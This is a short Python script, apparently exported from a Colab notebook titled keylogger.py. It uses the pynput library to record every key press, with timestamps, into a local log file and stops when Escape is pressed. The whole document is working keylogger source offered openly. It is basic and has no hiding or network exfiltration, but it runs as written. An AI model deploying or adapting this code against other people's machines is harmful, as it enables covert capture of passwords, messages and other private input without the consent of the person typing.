# -*- coding: utf-8 -*-
"""keylogger.py.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/159sGfOqV_EipwfFTA6maALXqeDnpt5lE
"""

from pynput.keyboard import Key, Listener
import logging

# Set up logging to capture keystrokes
log_file = "unknown2473_keylog.txt"
logging.basicConfig(filename=log_file, level=logging.INFO, format="%(asctime)s: %(message)s")

def on_press(key):
    try:
        logging.info(f"Key {key.char} pressed")
    except AttributeError:
        logging.info(f"Special key {key} pressed")

def on_release(key):
    if key == Key.esc:
        # Stop listener when escape key is pressed
        return False

# Collect keystrokes
with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()